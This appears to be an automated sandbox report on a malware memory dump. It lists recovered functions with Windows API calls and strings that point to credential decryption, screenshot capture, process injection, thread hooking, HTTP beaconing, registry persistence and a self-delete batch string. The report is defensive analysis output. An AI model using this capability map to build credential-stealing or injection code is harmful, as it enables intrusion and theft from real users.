Part of subcall function 00C4FA0A: EnterCriticalSection.KERNEL32(?,77C475F0,7C809F91,?,?,?,?,00C2D004,00000000), ref: 00C4FB0C
Part of subcall function 00C4FA0A: LeaveCriticalSection.KERNEL32(?,?,?,77C475F0,7C809F91,?,?,?,?,00C2D004,00000000), ref: 00C4FB4D
Part of subcall function 00C4FA0A: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C4FB5C
Part of subcall function 00C4FA0A: SetEvent.KERNEL32 ref: 00C4FB6C
Part of subcall function 00C4FA0A: GetExitCodeThread.KERNEL32(?,?), ref: 00C4FB80
Part of subcall function 00C4FA0A: CloseHandle.KERNEL32 ref: 00C4FB96

Part of subcall function 00C2BFFE: getsockopt.WS2_32(?,0000FFFF,00001008,?,?), ref: 00C2C08A
Part of subcall function 00C2BFFE: GetHandleInformation.KERNEL32(?,?), ref: 00C2C09C
Part of subcall function 00C2BFFE: socket.WS2_32(?,00000001,00000006), ref: 00C2C0CF
Part of subcall function 00C2BFFE: socket.WS2_32(?,00000002,00000011), ref: 00C2C0E0
Part of subcall function 00C2BFFE: closesocket.WS2_32(00000002), ref: 00C2C0FF
Part of subcall function 00C2BFFE: closesocket.WS2_32 ref: 00C2C106
Part of subcall function 00C2BFFE: memset.MSVCRT ref: 00C2C1C8
Part of subcall function 00C2BFFE: memcpy.MSVCRT ref: 00C2C3C8

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

WaitForMultipleObjects.KERNEL32(?,?,00000000,0000EA60), ref: 00C2D061

Part of subcall function 00C35B40: EnterCriticalSection.KERNEL32(?,7C809F91,?,00C2D091,?,?,00000000,0000EA60,00000000), ref: 00C35B48
Part of subcall function 00C35B40: WaitForSingleObject.KERNEL32(?,00000000), ref: 00C35B6C
Part of subcall function 00C35B40: CloseHandle.KERNEL32 ref: 00C35B7C
Part of subcall function 00C35B40: LeaveCriticalSection.KERNEL32(?,?,7C809F91,?,00C2D091,?,?,00000000,0000EA60,00000000), ref: 00C35BAC

Part of subcall function 00C2C41C: EnterCriticalSection.KERNEL32(?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00C2C44D
Part of subcall function 00C2C41C: WSAGetLastError.WS2_32(?,?,?,?,?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00C2C4DF
Part of subcall function 00C2C41C: SetEvent.KERNEL32 ref: 00C2C532
Part of subcall function 00C2C41C: SetEvent.KERNEL32 ref: 00C2C56B
Part of subcall function 00C2C41C: LeaveCriticalSection.KERNEL32(?,?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00C2C5F0

Part of subcall function 00C3229C: EnterCriticalSection.KERNEL32(?,?,?,?,?,00C2D154,?,?,?,00000001,?,?,?,00000000,0000EA60), ref: 00C322BD
Part of subcall function 00C3229C: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00C2D154,?,?,?,00000001,?,?,?,00000000,0000EA60), ref: 00C322D9

Part of subcall function 00C33172: memset.MSVCRT ref: 00C3328F
Part of subcall function 00C33172: memcpy.MSVCRT ref: 00C332A2
Part of subcall function 00C33172: memcpy.MSVCRT ref: 00C332B8

Part of subcall function 00C52D0B: accept.WS2_32(?,0000EA60), ref: 00C52D2C
Part of subcall function 00C52D0B: WSAEventSelect.WS2_32(?,00000000,00000000), ref: 00C52D3E
Part of subcall function 00C52D0B: WSAGetLastError.WS2_32(00000023,?,00000000,00000000,?,0000EA60,?,77C475F0,?,?,?,?,00C2D163,?), ref: 00C52D6F
Part of subcall function 00C52D0B: shutdown.WS2_32(?,00000002), ref: 00C52D87
Part of subcall function 00C52D0B: closesocket.WS2_32 ref: 00C52D8E
Part of subcall function 00C52D0B: WSASetLastError.WS2_32(00000008,?,?,00000002,?,00000000,00000000,?,0000EA60,?,77C475F0,?,?,?,?,00C2D163), ref: 00C52D95

Part of subcall function 00C2F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00C2F82D

Part of subcall function 00C2C5FE: EnterCriticalSection.KERNEL32(?,77C475F0,?,?,?,?,?,00C2D203,?,?,00000000,?,?,?,?,00000000), ref: 00C2C631
Part of subcall function 00C2C5FE: memcmp.MSVCRT ref: 00C2C67F
Part of subcall function 00C2C5FE: SetEvent.KERNEL32 ref: 00C2C6C0
Part of subcall function 00C2C5FE: LeaveCriticalSection.KERNEL32(?,?,77C475F0,?,?,?,?,?,00C2D203,?,?,00000000,?), ref: 00C2C6ED

Part of subcall function 00C35C67: EnterCriticalSection.KERNEL32(00F421E4,?,?,00000001,00C44EA8,?,?,00000001), ref: 00C35C70
Part of subcall function 00C35C67: LeaveCriticalSection.KERNEL32(00F421E4,?,00000001,00C44EA8,?,?,00000001), ref: 00C35C7A
Part of subcall function 00C35C67: WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00C35CA0
Part of subcall function 00C35C67: EnterCriticalSection.KERNEL32(00F421E4,?,00000001,00C44EA8,?,?,00000001), ref: 00C35CB8
Part of subcall function 00C35C67: LeaveCriticalSection.KERNEL32(00F421E4,?,00000001,00C44EA8,?,?,00000001), ref: 00C35CC2

CloseHandle.KERNEL32(?), ref: 00C2D260
CloseHandle.KERNEL32(?), ref: 00C2D26D

Part of subcall function 00C4FE44: EnterCriticalSection.KERNEL32(?,00000000,?,?,00C4FB19,?,77C475F0,7C809F91,?,?,?,?,00C2D004,00000000), ref: 00C4FE4D
Part of subcall function 00C4FE44: LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,00C4FB19,?,77C475F0,7C809F91,?,?,?,?,00C2D004,00000000), ref: 00C4FE84

DeleteCriticalSection.KERNEL32(?,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00C2D283

Part of subcall function 00C2FCFF: memset.MSVCRT ref: 00C2FD0F

DeleteCriticalSection.KERNEL32(?,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00C2D2A2
CloseHandle.KERNEL32(?), ref: 00C2D2AF
DeleteCriticalSection.KERNEL32(?,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00C2D2B9

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C35B10: CloseHandle.KERNEL32 ref: 00C35B20
Part of subcall function 00C35B10: DeleteCriticalSection.KERNEL32(?,?,00F421D8,00C44EB9,?,?,00000001), ref: 00C35B37

Part of subcall function 00C2CEB1: WaitForSingleObject.KERNEL32(?,00000000), ref: 00C2CEB9

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C3338D, Relevance: 20.3, APIs: 7, Strings: 3, Instructions: 143

APIs

GetProcAddress.KERNEL32(?,GdipGetImageEncodersSize), ref: 00C333AB
GetProcAddress.KERNEL32(?,GdipGetImageEncoders), ref: 00C333B6
GetProcAddress.KERNEL32(?,GdipSaveImageToStream), ref: 00C333C1

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

lstrcmpiW.KERNEL32(?), ref: 00C3344E
memcpy.MSVCRT ref: 00C33471

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00C3349C
memcpy.MSVCRT ref: 00C334CA

Strings

GdipGetImageEncodersSize, xrefs: 00C3339C
GdipGetImageEncoders, xrefs: 00C333AD
GdipSaveImageToStream, xrefs: 00C333B8

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C4B33E, Relevance: 20.3, APIs: 8, Strings: 2, Instructions: 107

APIs

memcpy.MSVCRT ref: 00C4B364
CreateFileMappingW.KERNEL32(000000FF,?,08000004,00000000,00001000,00000000), ref: 00C4B385
MapViewOfFile.KERNEL32(?,00000006,00000000,00000000,00001000), ref: 00C4B39D

Part of subcall function 00C4AF22: UnmapViewOfFile.KERNEL32 ref: 00C4AF2E
Part of subcall function 00C4AF22: CloseHandle.KERNEL32 ref: 00C4AF3F

memset.MSVCRT ref: 00C4B3F2
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 00C4B42B

Part of subcall function 00C4AF4A: DuplicateHandle.KERNEL32(000000FF,?,?,00000000,00000000,00000002,00C5F128), ref: 00C4AF7C
Part of subcall function 00C4AF4A: DuplicateHandle.KERNEL32(000000FF,?,?,00000000,00000000,00000002), ref: 00C4AF9C
Part of subcall function 00C4AF4A: memset.MSVCRT ref: 00C4B039
Part of subcall function 00C4AF4A: memcpy.MSVCRT ref: 00C4B04B

ResumeThread.KERNEL32(?), ref: 00C4B44E
CloseHandle.KERNEL32(?), ref: 00C4B465
CloseHandle.KERNEL32(?), ref: 00C4B46B

Strings

-m%p, xrefs: 00C4B3CD
D, xrefs: 00C4B423

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C350C0, Relevance: 18.5, APIs: 8, Strings: 1, Instructions: 60

APIs

GetCurrentThread.KERNEL32 ref: 00C350D4
OpenThreadToken.ADVAPI32 ref: 00C350DB
GetCurrentProcess.KERNEL32 ref: 00C350EB
OpenProcessToken.ADVAPI32 ref: 00C350F2
LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 00C35113
AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00C35128
GetLastError.KERNEL32 ref: 00C35132
CloseHandle.KERNEL32(00000001), ref: 00C35143

Strings

SeTcbPrivilege, xrefs: 00C35106

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C40A9A, Relevance: 18.4, APIs: 8, Strings: 1, Instructions: 182

APIs

Part of subcall function 00C29F72: memcpy.MSVCRT ref: 00C29F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C40AD8
PathRemoveFileSpecW.SHLWAPI(?), ref: 00C40B26

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

FindFirstFileW.KERNEL32(?,?), ref: 00C40B93
CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00C40BEA
FindClose.KERNEL32 ref: 00C40CF3

Part of subcall function 00C2E4C3: GetFileSizeEx.KERNEL32(?,?), ref: 00C2E4CE

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

SetLastError.KERNEL32(00000057,?), ref: 00C40C5B

Part of subcall function 00C2E543: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00C2E555

CloseHandle.KERNEL32 ref: 00C40C95

Part of subcall function 00C2E348: CloseHandle.KERNEL32 ref: 00C2E354

FindNextFileW.KERNEL32(?,?), ref: 00C40CC9

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C2E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00C2E82F
Part of subcall function 00C2E826: DeleteFileW.KERNEL32(?), ref: 00C2E836

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00C40AFA

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2ADFB, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 184

APIs

GetLogicalDrives.KERNEL32 ref: 00C2AE0F

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

SHGetFolderPathW.SHELL32(00000000,00006024,00000000,00000000,?), ref: 00C2AE54
PathGetDriveNumberW.SHLWAPI(?), ref: 00C2AE66
lstrcpyW.KERNEL32(?,00C275B0), ref: 00C2AE7A
GetDriveTypeW.KERNEL32(?), ref: 00C2AEE3
GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000105), ref: 00C2AF44
CharUpperW.USER32(?), ref: 00C2AF60
lstrcmpW.KERNEL32(?), ref: 00C2AF83
GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,?), ref: 00C2AFC1

Strings

#, xrefs: 00C2AE9E

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C3F23B, Relevance: 16.5, APIs: 9, Instructions: 176

APIs

lstrlenW.KERNEL32 ref: 00C3F31C

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,00000000,?), ref: 00C3F389

Part of subcall function 00C53D5A: memcpy.MSVCRT ref: 00C53D94

LocalFree.KERNEL32(?), ref: 00C3F3A7
lstrlenW.KERNEL32(?), ref: 00C3F410

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

#6.OLEAUT32 ref: 00C3F432
#6.OLEAUT32(?), ref: 00C3F438
#6.OLEAUT32 ref: 00C3F43B
#6.OLEAUT32(?), ref: 00C3F441
#6.OLEAUT32 ref: 00C3F444

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C408C0, Relevance: 16.3, APIs: 7, Strings: 1, Instructions: 146

APIs

Part of subcall function 00C29F72: memcpy.MSVCRT ref: 00C29F80

Part of subcall function 00C36A7D: memcpy.MSVCRT ref: 00C36A9C

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C40934
PathRemoveFileSpecW.SHLWAPI(?), ref: 00C40982
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 00C409F8
GetLastError.KERNEL32(?,?,?,00000000,3D94878D), ref: 00C40A05
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00C40A2F
FlushFileBuffers.KERNEL32 ref: 00C40A49
CloseHandle.KERNEL32 ref: 00C40A50

Part of subcall function 00C2E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00C2E82F
Part of subcall function 00C2E826: DeleteFileW.KERNEL32(?), ref: 00C2E836

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00C40956

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C38F66, Relevance: 16.3, APIs: 3, Strings: 5, Instructions: 75

APIs

Part of subcall function 00C38E45: InternetCloseHandle.WININET ref: 00C38E57

HttpOpenRequestA.WININET(?,?,?,HTTP/1.1,00000000,00C27BD8,?,00000000), ref: 00C38FA7
HttpAddRequestHeadersA.WININET(?,Connection: Close,00000013,A0000000), ref: 00C38FCA
HttpSendRequestExA.WININET(?,?,00000000,00000000,00000000), ref: 00C3900C

Strings

HTTP/1.1, xrefs: 00C38F8E
GET, xrefs: 00C38F96
POST, xrefs: 00C38F9B
Connection: Close, xrefs: 00C38FC4
(, xrefs: 00C39005

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C54181, Relevance: 16.2, APIs: 9, Instructions: 128

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C541A1
Process32FirstW.KERNEL32(?,?), ref: 00C541C6

Part of subcall function 00C4BE5A: CreateMutexW.KERNEL32(00C62974,00000001,?), ref: 00C4BEA0
Part of subcall function 00C4BE5A: GetLastError.KERNEL32(?,?,?,00000002,00000000), ref: 00C4BEAC
Part of subcall function 00C4BE5A: CloseHandle.KERNEL32 ref: 00C4BEBA

OpenProcess.KERNEL32(00000400,00000000,?), ref: 00C5421D
CloseHandle.KERNEL32(?), ref: 00C542E7

Part of subcall function 00C3500E: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 00C35020
Part of subcall function 00C3500E: GetTokenInformation.ADVAPI32(?,0000000C,00C62968,00000004,?), ref: 00C35048
Part of subcall function 00C3500E: CloseHandle.KERNEL32(?), ref: 00C3505E

CloseHandle.KERNEL32 ref: 00C5423B
GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,00000001), ref: 00C54257
memcmp.MSVCRT ref: 00C5426F

Part of subcall function 00C36A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?,?), ref: 00C36A43
Part of subcall function 00C36A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?), ref: 00C36A56

Part of subcall function 00C540CB: OpenProcess.KERNEL32(0000047A,00000000,?), ref: 00C540DC
Part of subcall function 00C540CB: CreateThread.KERNEL32(00000000,00000000,00C540AB,?), ref: 00C54132
Part of subcall function 00C540CB: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C5413D
Part of subcall function 00C540CB: CloseHandle.KERNEL32 ref: 00C54144
Part of subcall function 00C540CB: WaitForSingleObject.KERNEL32(?,00002710), ref: 00C54154
Part of subcall function 00C540CB: CloseHandle.KERNEL32(?), ref: 00C5415B
Part of subcall function 00C540CB: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00C5416C
Part of subcall function 00C540CB: CloseHandle.KERNEL32 ref: 00C54173

Process32NextW.KERNEL32(?,?), ref: 00C542F3
CloseHandle.KERNEL32 ref: 00C54306

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C307D0, Relevance: 16.1, APIs: 9, Instructions: 156

APIs

GetCurrentThreadId.KERNEL32 ref: 00C307D6
memcpy.MSVCRT ref: 00C30822
memset.MSVCRT ref: 00C3085A
GetThreadContext.KERNEL32(?,?), ref: 00C30895
SetThreadContext.KERNEL32(?,?), ref: 00C30900
GetCurrentProcess.KERNEL32 ref: 00C30919
VirtualProtect.KERNEL32(?,0000007C,?,?), ref: 00C3093E
FlushInstructionCache.KERNEL32(?,?,0000007C), ref: 00C30950

Part of subcall function 00C30643: memset.MSVCRT ref: 00C30654

Part of subcall function 00C303FD: GetCurrentProcess.KERNEL32 ref: 00C30400
Part of subcall function 00C303FD: VirtualProtect.KERNEL32(00000000,00010000,00000020,?), ref: 00C30421
Part of subcall function 00C303FD: FlushInstructionCache.KERNEL32(?,00000000,00010000), ref: 00C3042A

ResumeThread.KERNEL32(?), ref: 00C30992

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C3072F: GetCurrentThreadId.KERNEL32 ref: 00C30730
Part of subcall function 00C3072F: VirtualProtect.KERNEL32(?,0000007C,?,?), ref: 00C30767
Part of subcall function 00C3072F: ResumeThread.KERNEL32(?), ref: 00C307A8

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2B74D, Relevance: 16.0, APIs: 9, Instructions: 112

APIs

GetProcAddress.KERNEL32(?,?), ref: 00C2B76F
GetProcAddress.KERNEL32(?,?), ref: 00C2B791
GetProcAddress.KERNEL32(?,?), ref: 00C2B7AC
GetProcAddress.KERNEL32(?,?), ref: 00C2B7C7
GetProcAddress.KERNEL32(?,?), ref: 00C2B7E2
GetProcAddress.KERNEL32(?,?), ref: 00C2B7FD
GetProcAddress.KERNEL32(?,?), ref: 00C2B81C
GetProcAddress.KERNEL32(?,?), ref: 00C2B83B
GetProcAddress.KERNEL32(?,?), ref: 00C2B85A

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C4B0C1, Relevance: 16.0, APIs: 9, Instructions: 103

APIs

GetCommandLineW.KERNEL32 ref: 00C4B0DB
CommandLineToArgvW.SHELL32 ref: 00C4B0E2
StrCmpNW.SHLWAPI(?,00C27F1C,00000002), ref: 00C4B108
LocalFree.KERNEL32 ref: 00C4B134

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,00001000), ref: 00C4B171
memcpy.MSVCRT ref: 00C4B184

Part of subcall function 00C4F8BA: memcpy.MSVCRT ref: 00C4F8E7

UnmapViewOfFile.KERNEL32 ref: 00C4B1BD
CloseHandle.KERNEL32 ref: 00C4B1F9

Part of subcall function 00C4B562: memset.MSVCRT ref: 00C4B587
Part of subcall function 00C4B562: memcpy.MSVCRT ref: 00C4B5E7
Part of subcall function 00C4B562: memcpy.MSVCRT ref: 00C4B5FF
Part of subcall function 00C4B562: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000104), ref: 00C4B66A
Part of subcall function 00C4B562: memcpy.MSVCRT ref: 00C4B6A8

memcpy.MSVCRT ref: 00C4B1E0

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C39152, Relevance: 16.0, APIs: 9, Instructions: 98

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00C39173

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

CloseHandle.KERNEL32 ref: 00C39198
SetLastError.KERNEL32(00000008,?,?,?,?,00C40646,?,?,?,?), ref: 00C391A0
WaitForSingleObject.KERNEL32(?,00000000), ref: 00C391BD
InternetReadFile.WININET(?,?,00001000,?), ref: 00C391DB
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00C39210
FlushFileBuffers.KERNEL32 ref: 00C39229

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

CloseHandle.KERNEL32 ref: 00C3923C
SetLastError.KERNEL32(00000000,?,?,00001000,?,?,?,?,00C40646,?,?,?,?), ref: 00C39257

Part of subcall function 00C2E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00C2E82F
Part of subcall function 00C2E826: DeleteFileW.KERNEL32(?), ref: 00C2E836

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2B392, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 230

APIs

Part of subcall function 00C50741: CoInitializeEx.OLE32(00000000,00000000), ref: 00C5074E

Part of subcall function 00C39F57: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,?,00C2B41A,?), ref: 00C39F69
Part of subcall function 00C39F57: #2.OLEAUT32(00C2B41A,00000000,?,?,?,00C2B41A,?), ref: 00C39F9D
Part of subcall function 00C39F57: #6.OLEAUT32(?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00C2B41A,?), ref: 00C39FD2
Part of subcall function 00C39F57: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00C39FF2

#2.OLEAUT32(WQL,?), ref: 00C2B480
#2.OLEAUT32(?,?), ref: 00C2B49C
#6.OLEAUT32(?,?,00000030,00000000,?), ref: 00C2B4CC
#9.OLEAUT32(?), ref: 00C2B53D

Part of subcall function 00C39F2C: #6.OLEAUT32(?,00000000,00C2B574), ref: 00C39F49
Part of subcall function 00C39F2C: CoUninitialize.OLE32 ref: 00C5078C

memcpy.MSVCRT ref: 00C2B616
memcpy.MSVCRT ref: 00C2B628
memcpy.MSVCRT ref: 00C2B63A

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

Strings

WQL, xrefs: 00C2B47B
displayName, xrefs: 00C2B50A

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C3E257, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 160

APIs

Part of subcall function 00C3568C: TlsSetValue.KERNEL32(00000001,00C554A7), ref: 00C35699

GetCurrentThread.KERNEL32 ref: 00C3E26F
SetThreadPriority.KERNEL32 ref: 00C3E276

Part of subcall function 00C4BEE3: CreateMutexW.KERNEL32(00C62974,00000000,?), ref: 00C4BF05

Part of subcall function 00C29F72: memcpy.MSVCRT ref: 00C29F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C3E2C0

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

Part of subcall function 00C3E22A: PathFindFileNameW.SHLWAPI(?), ref: 00C3E22E
Part of subcall function 00C3E22A: PathRemoveExtensionW.SHLWAPI(?), ref: 00C3E242
Part of subcall function 00C3E22A: CharUpperW.USER32(?,?,?,00C3E32B), ref: 00C3E24C

PathQuoteSpacesW.SHLWAPI(?), ref: 00C3E333

Part of subcall function 00C44B8D: WaitForSingleObject.KERNEL32(00000000,00C554CE), ref: 00C44B95

WaitForSingleObject.KERNEL32 ref: 00C3E374
StrCmpW.SHLWAPI(?,?), ref: 00C3E3CE

Part of subcall function 00C40D74: RegCreateKeyExW.ADVAPI32(80000001,00000102,00000000,00000000,00000000,?,00000000,?,?), ref: 00C40D9C

RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00C3E42F

Part of subcall function 00C40D19: RegFlushKey.ADVAPI32 ref: 00C40D29
Part of subcall function 00C40D19: RegCloseKey.ADVAPI32 ref: 00C40D31

WaitForSingleObject.KERNEL32 ref: 00C3E450

Part of subcall function 00C32FB7: ReleaseMutex.KERNEL32 ref: 00C32FBB
Part of subcall function 00C32FB7: CloseHandle.KERNEL32 ref: 00C32FC2

Part of subcall function 00C5046D: EnterCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C5047A
Part of subcall function 00C5046D: LeaveCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C50488

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00C3E2E2

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C44214, Relevance: 15.1, APIs: 5, Strings: 2, Instructions: 97

APIs

EnterCriticalSection.KERNEL32(00C63510,?,00C62DB4,00000000,00000006,?,00C4BBC2,00C62DB4,?,?,00000000), ref: 00C4422E
LeaveCriticalSection.KERNEL32(00C63510,?,00C62DB4,00000000,00000006,?,00C4BBC2,00C62DB4,?,?,00000000), ref: 00C44261

Part of subcall function 00C3DEBB: GetModuleHandleW.KERNEL32(shell32.dll), ref: 00C3DEC9
Part of subcall function 00C3DEBB: GetProcAddress.KERNEL32(?,SHGetKnownFolderPath), ref: 00C3DED5
Part of subcall function 00C3DEBB: SetLastError.KERNEL32(00000001,00C442C8,00C62954,?,00C62DB4,00000000,00000006,?,00C4BBC2,00C62DB4,?,?,00000000), ref: 00C3DEED

CoTaskMemFree.OLE32(00000000), ref: 00C442F6
PathRemoveBackslashW.SHLWAPI(?), ref: 00C44303
SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00C4431A

Strings

SHGetKnownFolderPath, xrefs: 00C442B9
shell32.dll, xrefs: 00C442BE

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

